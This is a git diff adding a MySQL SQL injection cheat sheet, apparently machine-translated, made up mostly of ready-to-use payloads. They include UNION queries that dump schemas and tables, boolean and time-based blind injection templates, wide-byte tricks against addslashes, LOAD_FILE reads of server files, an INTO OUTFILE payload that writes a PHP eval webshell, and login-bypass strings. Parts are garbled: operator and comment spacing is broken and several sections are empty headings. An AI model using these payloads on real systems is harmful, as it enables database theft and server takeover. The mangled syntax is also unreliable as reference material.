naveen12 · October 23, 2019 16:23 · Dec 21, 2017
diff --git a/0x01 basic sqlinjection cheat sheet b/0x01 basic sqlinjection cheat sheet
@@ -0,0 +1,234 @@
+0x01 basic
+Check the current database version
+VERSION ()
+@@ VERSION
+@@ GLOBAL.VERSION
+Currently logged in user
+USER ()
+CURRENT_USER ()
+SYSTEM_USER ()
+SESSION_USER ()
+Currently used database
+DATABASE ()
+SCHEMA ()
+Path related
+@@ BASEDIR: mysql installation path:
+@@ SLAVE_LOAD_TMPDIR: Temporary folder path:
+@@ DATADIR: Data Storage Path:
+@@ CHARACTER_SETS_DIR: character set file path
+@@ LOG_ERROR: error log file path:
+@@ PID_FILE: pid-file file path
+@@ BASEDIR: mysql installation path:
+@@ SLAVE_LOAD_TMPDIR: Temporary folder path:
+Joint data
+CONCAT ()
+GROUP_CONCAT ()
+CONCAT_WS ()
+Alphanumeric related
+ASCII (): Get the ascii code value of the letter
+BIN (): The binary string representation of the return value
+CONV (): hex conversion
+FLOOR ()
+ROUND ()
+LOWER (): turn into lowercase letters
+UPPER (): converted to capital letters
+HEX (): hexadecimal encoding
+UNHEX (): hexadecimal decoding
+String interception
+MID ()
+LEFT ()
+SUBSTR ()
+SUBSTRING ()
+Comments
+Interline comments
+- - (- there is a space behind)
+DROP sampletable; -
+#
+DROP sampletable; #
+`(Backtick)
+Inline comments
+/ * * / + DROP / * content * / sampletable;
+/ *! Statement * /
+/ *! select * from test * /
+Statement will be executed
+0x02 injection technology
+Determine whether there is injection
+Assumptions are: www.test.com/chybeta.php?id=1
+Numeric injection
+chybeta.php?id=1+1
+chybeta.php?id=-1 or 1=1
+chybeta.php?id=-1 or 10-2=8
+chybeta.php?id=1 and 1=2
+chybeta.php?id=1 and 1=1
+Character injection
+The parameters are surrounded by quotes, we need to close the quotes.
+chybeta.php?id=1'
+chybeta.php?id=1"
+chybeta.php?id=1' and '1'='1
+chybeta.php?id=1" and "1"="1
+Joint inquiry
+Query the number of columns
+With UNION SELECT injection, if the data to be noted later out of the column with the original number of data columns, it will fail. So need to guess the number of columns.
+UNION SELECT
+UNION SELECT 1,2,3 #
+UNION ALL SELECT 1,2,3 #
+UNION ALL SELECT null,null,null #
+ORDER BY
+Use dichotomy
+ORDER BY 10 #
+ORDER BY 5  #
+ORDER BY 2  #
+....
+Query the database
+UNION SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA #
+Query table name
+UNION SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() #
+Assuming to obtain the database name "databasename", its hexadecimal encoding 0x64617461626173656e616d65.
+UNION SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x64617461626173656e616d65 #
+Query column name
+Obtained from the previous step to the table named tablename, its hexadecimal code obtained
+UNION SELECT GROUP_CONCAT(column_name SEPARATOR+0x3c62723e) FROM+INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7461626c656e616d65 #
+retrieve data
+UNION SELECT GROUP_CONCAT(column_1,column_2 SEPARATOR+0x3c62723e) FROM databasename.tablename #
+insert / update / delete injection
+Reference: SQL Injection in Insert Update and Delete Statements Assuming the background statement is:
+insert into user(id,name,pass) values (1,"chybeta","123456");
+order by after injection
+This part finishing self- sleepy Dragon: MySql injection science popularize by the sort statement, so you can use the conditional statements to make judgments, according to the return of the different sorts of results to determine the true and false conditions.
+Detection method
+Generally with oder or orderby variables is likely to be such an injection, when you know a field can be injected as follows:
+Original link: http://www.test.com/list.php?order=vote Sort according to the vote field.
+Find the largest number of votes to vote num Then construct the following link to see whether the sort of change. :
+list.php?order=abs(vote-(length(user())>0)*num)+asc
+Another method does not need to know any field information, use the rand function:
+list.php?order=rand(true)
+list.php?order=rand(false)
+The above two will return a different sort.
+payload
+The statement to determine whether the first character in the table name is less than 128 is as follows:
+http://www.test.com/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))
+Error injection
+Blind betting
+Blind scene
+In many cases, through the previous test will find the page did not echo the extracted data, but depending on whether the statement is executed successfully or not, there will be some corresponding changes.
+The correct / wrong statement makes the page have a moderate change. You can try using Boolean injection
+The correct statement returns the normal page, the wrong statement returns the common error page. You can try using Boolean injection.
+Submit the wrong statement, does not affect the normal output of the page. Try using delayed injection.
+Several simple sentences to judge, in the real need to change according to the situation:
+CASE
+IF ()
+IFNULL ()
+NULLIF ()
+Boolean blinds - based on the response
+Submit a logic statement to infer a bit of information. Because injection requires (general) character-by-character execution, scripts or tools (such as the burp suite) need to be used. The following is:
+payload
+// i 用于提取每一个位，j 用于判断其对应的ASCII码值的范围。
+// k ，结合limit，选择偏移为k的行
+// **中可以填上其他的select语句，比如查询表名，列名，数据。一次类推。
+// SUBSTR() 也可以换成 SUBSTRING()
+
+' OR (SELECT ASCII(SUBSTR(DATABASE(),i,1) ) < j) #
+
+' OR (SELECT ASCII(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) ) < j) #  
+
+' OR (SELECT SUBSTR(DATABASE(),i,1) < j) #
+
+' OR (SELECT SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j) #  
+
+' OR SUBSTR((SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT k,1),i,1) < j #
+
+...
+script
+Script use, visible: ctf blind using script points:
+Pay attention to the coding problem
+Pay attention to the exception handling
+Pay attention to the border processing
+Delayed blinds - based on time
+Generally use a few functions. The effect of using these is to delay the operation of mysql, and thus detect the situation with the usual difference:
+SLEEP (n) to stop mysql n seconds
+BENCHMARK (count, expr) Repeats the countTimes occurrence of the expression expr
+Some notes:
+The use of time-based blinds is not as accurate as it depends on the current network environment.
+Time delay is best not to exceed 30 seconds, otherwise easily lead to mysql API connection timeout.
+When the page does not see any significant change, then consider the choice of using delayed injection.
+Detection method
+1 OR SLEEP(25)=0 LIMIT 1 #
+1) OR SLEEP(25)=0 LIMIT 1 #
+1' OR SLEEP(25)=0 LIMIT 1 #
+') OR SLEEP(25)=0 LIMIT 1 #
+1)) OR SLEEP(25)=0 LIMIT 1 #
+SELECT SLEEP(25) #
+payload
+
+UNION SELECT IF(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j,BENCHMARK(100000,SHA1(1)),0)
+
+UNION SELECT IF(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j,SLEEP(10),0)
+
+...
+Wide byte injection
+principle
+Have the following php code:
+...
+mysql_query("SET NAMES 'gbk'");
+....
+$name = isset($_GET['name']) ? addslashes($_GET['name']) : 1;
+$sql = "SELECT * FROM test WHERE names='{$name}'";
+addslashes () adds a single or double quotation mark \. When mysql GBK character set, it will be two characters as a Chinese character, such as% df% 5c for transport. We enter name=root%df%27,% the server will appear the following conversion: root%df%27-> root%df%5c%27-> root運'.
+More can be seen: Character Encoding and SQL Injection in White Box Audit
+payload
+Eat\
+index.php?name=1%df'
+index.php?name=1%a1'
+index.php?name=1%aa'
+...
+After being addedlashes,% XX% 5c appears. If the ascii code value of the current character is greater than 128, it will be considered as a wide character, even if it is not a Chinese character. So not only% df can eat '\'.
+use\
+index.php?name=%**%5c%5c%27
+Secondary injection
+File read and write
+Use sql injection can import export file, get the file content, or write to the file content. Query user read and write permissions:
+SELECT file_priv FROM mysql.user WHERE user = 'username';
+load_file () read
+condition
+Need to read the file permissions
+Need to know the absolute physical path of the file.
+The size of the file to read must be less than max_allowed_packet
+SELECT @@max_allowed_packet;
+payload
+Directly use the absolute path, pay attention to the processing of the slash path.
+UNION SELECT LOAD_FILE("C://TEST.txt") #
+
+UNION SELECT LOAD_FILE("C:/TEST.txt") #
+
+UNION SELECT LOAD_FILE("C:\\TEST.txt") #
+Use encoding
+
+UNION SELECT LOAD_FILE(CHAR(67,58,92,92,84,69,83,84,46,116,120,116)) #
+
+UNION SELECT LOAD_FILE(0x433a5c5c544553542e747874) #
+select Export
+condition
+General to specify the absolute path
+The directory to be exported has write permission
+The file to outfile can not already exist
+payload
+UNION SELECT DATABASE() INTO OUTFILE 'C:\\phpstudy\\WWW\\test\\1';
+
+UNION SELECT DATABASE() INTO OUTFILE 'C:/phpstudy/WWW/test/1';
+Write webshell
+condition
+Need to know the site's absolute physical path, so after export webshell can be accessed
+Need to export the directory can write permission.
+payload
+UNION SELECT  "<?php eval($_POST['chybeta'])?>" INTO OUTFILE 'C:/phpstudy/WWW/test/webshell.php';
+Universal password login
+admin '-
+admin '#
+admin '/ *
+or '=' or
+'or 1 = 1-
+'or 1 = 1 #
+'or 1 = 1 / *
+') or' 1 '=' 1-
+') or (' 1 '=' 1-
+PDO heap query